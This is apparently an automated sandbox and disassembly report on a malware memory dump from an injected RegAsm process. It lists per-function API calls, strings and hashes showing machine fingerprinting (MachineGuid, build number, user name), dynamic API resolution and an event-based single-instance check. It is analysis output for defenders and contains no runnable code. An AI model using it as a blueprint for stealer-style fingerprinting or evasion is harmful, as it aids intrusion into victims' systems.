Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <$zZ@$zZ@
API String ID: 1274457161-2926614232
Opcode ID: 52b674d9e5705abcc11803e9a59139e7e6dfb7668a99b887773ff33d78523bb2
Instruction ID: 5ec785183fc32c623f1de6a7566c658e8ea65be6cb1651013de8fb2e27aaef0e
Opcode Fuzzy Hash: 52b674d9e5705abcc11803e9a59139e7e6dfb7668a99b887773ff33d78523bb2
Instruction Fuzzy Hash: 1C2160B5900208EBDB00DFA4D885BDD7BB8FF05724F14022AFA25A72C1DB395A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB50 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0156F810,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040EBB0
StrCmpCA.SHLWAPI(00000000,0156F820,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040EC3A
StrCmpCA.SHLWAPI(00000000,0156F830,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040ED6A

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

StrCmpCA.SHLWAPI(00000000,0156F810), ref: 0040EE24
StrCmpCA.SHLWAPI(00000000,0156F820), ref: 0040EEB0

Strings

Stable\, xrefs: 0040EC7D
Stable\, xrefs: 0040EEF3

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\
API String ID: 3722407311-4033978473
Opcode ID: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction ID: d8ce4b8c1e13b8f110d5154c309a70af36248a3d2e26b75c81aeb3fa987dec21
Opcode Fuzzy Hash: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction Fuzzy Hash: E4E1CA70900248DBCB14EFA9C946BDDBBB5AF59304F10C16EF945A7382DB785608C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00418860 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00418970: LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
Part of subcall function 00418970: GetProcAddress.KERNEL32(00000000,0155F1E0), ref: 00418990
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F1F8), ref: 004189BD
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 004189D6
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F390), ref: 004189EE
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F510), ref: 00418A06
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,01562EC0), ref: 00418A1F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,01562BE0), ref: 00418A37
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,015629C0), ref: 00418A4F
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F498), ref: 00418A68
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F4F8), ref: 00418A80
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F540), ref: 00418A98
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F4E0), ref: 00418AB1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,01562CE0), ref: 00418AC9
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F528), ref: 00418AE1
Part of subcall function 00418970: GetProcAddress.KERNEL32(74DD0000,0155F4B0), ref: 00418AFA

Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00401090: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 0040109D
Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01562EF0), ref: 004102A7

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01562EF0,?,00428884,?,00000000,004283B2), ref: 004188F6
CloseHandle.KERNEL32(00000000), ref: 00418901
Sleep.KERNEL32(00001B58), ref: 0041890C
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418922
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041893C
CloseHandle.KERNEL32(00000000), ref: 0041894A
ExitProcess.KERNEL32 ref: 00418952

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
String ID:
API String ID: 3108587868-0
Opcode ID: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction ID: 647acd411ead89d836921b015eed4027088bc395b0a35a31edabbaa9f7aa6c77
Opcode Fuzzy Hash: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction Fuzzy Hash: BA217F309001096AD700F7F1DC56FEE7369AF05709F50012EF606B60D2DF7C2989866D

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CB5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
CharToOemA.USER32(00000000,?), ref: 00410D12

Strings

MachineGuid, xrefs: 00410CEE
SOFTWARE\Microsoft\Cryptography, xrefs: 00410CC8

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction ID: 734486b7100e6d63ed2b29b9d7cba1e03fbf9e6038e99d6900f302105bc7df50
Opcode Fuzzy Hash: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction Fuzzy Hash: 8601B579640219ABD724DB90DC4AFE97778AB14704F104199B645621C0DAB46A858B50

Uniqueness

Uniqueness Score: -1.00%

Function 004106E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
wsprintfA.USER32 ref: 0041073B

Strings

%d MB, xrefs: 00410735
@, xrefs: 0041070E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction ID: 3858def785d9e4baa448147c13a215b95796b3cfcd3afa1d1fab1a2876bbce8c
Opcode Fuzzy Hash: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction Fuzzy Hash: A3F09675A40118ABE7149BA4EC1AFFE77ADEB01701F500119F706D72C0DBB89C4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406E40 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
LocalFree.KERNEL32(?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE1
CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction ID: fca360b4b4926ce2ce86bd9a704f617748b4363ecef1e2cd769cd9a162bdc231
Opcode Fuzzy Hash: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction Fuzzy Hash: 0F214CB560020AAFDB10DFA4DC84FAF77A9EB49714F10022AF912A72C0D7389D51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407240 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

GetEnvironmentVariableA.KERNEL32(0156F6D0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,00000000,01572138,?,00427A64,?,?,015721F8,015721F8,00427A5F,?), ref: 00407311

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

SetEnvironmentVariableA.KERNEL32(0156F6D0,00000000,00000000,hzB,?,?,00427A68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00427A63), ref: 0040738E
LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00420658,000000FF,?,0040BE2B), ref: 004073A9

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040730B, 00407324
hzB, xrefs: 00407349, 00407366, 0040734D

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$hzB
API String ID: 2929475105-2770337157
Opcode ID: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction ID: 579015a8dc8e7fb9ba4dc0b4b2d1472570f0f46b00a7972d46a8666dc34995d3
Opcode Fuzzy Hash: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction Fuzzy Hash: DC71E570900249DEDB04EBE4D846BEEBBB9AF1A304F14417EF905672D1DF781A48C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00415650 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

fA, xrefs: 004156F1, 004157B3, 004156F4
fA, xrefs: 004157CA

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: fA$fA
API String ID: 4198075804-1630953348
Opcode ID: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction ID: 4a7e4500b8fefa130c25cbd9421f046c1ba1e46fcba1c1cc5636780b9c3006f8
Opcode Fuzzy Hash: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction Fuzzy Hash: 40412D74801249EADB11EFA5C981BDDBBB4AB19304F50407EE906676C2DF781A4CCBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410F40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 00410200: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
Part of subcall function 00410200: HeapAlloc.KERNEL32(00000000), ref: 0041021C
Part of subcall function 00410200: RegOpenKeyExA.KERNEL32(80000002,0156B908,00000000,00020119,?), ref: 0041023B
Part of subcall function 00410200: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

RegOpenKeyExA.KERNEL32(80000002,0156B908,00000000,00020119,00000000), ref: 00410F91
RegQueryValueExA.KERNEL32(00000000,01572168,00000000,00000000,00000000,000000FF), ref: 00410FAC

Strings

Windows 11, xrefs: 00410F70

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction ID: 53ce30e9246303524b4cf8f670f0acc819984a5071f51573bc99cb0a8d9a2c5a
Opcode Fuzzy Hash: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction Fuzzy Hash: C701267860020AFBD714DBA0EC4EEABB7BDEB45B01F104159FA04D7250D6B45D80C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00410200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
HeapAlloc.KERNEL32(00000000), ref: 0041021C
RegOpenKeyExA.KERNEL32(80000002,0156B908,00000000,00020119,?), ref: 0041023B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

Strings

CurrentBuildNumber, xrefs: 0041024F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction ID: 4c14057a90075943bc9431615e63d58b06497ca245fa930b3837fb80e640c4dc
Opcode Fuzzy Hash: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction Fuzzy Hash: 4AF0AFB9540205BBE7109BA0EC4EFABBBADEF49B01F500155FA0596280E6B45A44C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417F00 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 660networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01562B00), ref: 00418CC5
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,015629A0), ref: 00418CDD
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DD58), ref: 00418CF6
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DDD0), ref: 00418D0E
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DB18), ref: 00418D26
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DDE8), ref: 00418D3F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01563F30), ref: 00418D57
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DBF0), ref: 00418D6F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DC98), ref: 00418D88
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DC68), ref: 00418DA0
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DB30), ref: 00418DB8
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01562B20), ref: 00418DD1
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,015626C0), ref: 00418DE9
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01562780), ref: 00418E01
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01562940), ref: 00418E1A
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0156DB48), ref: 00418E32

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0156F1F0,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

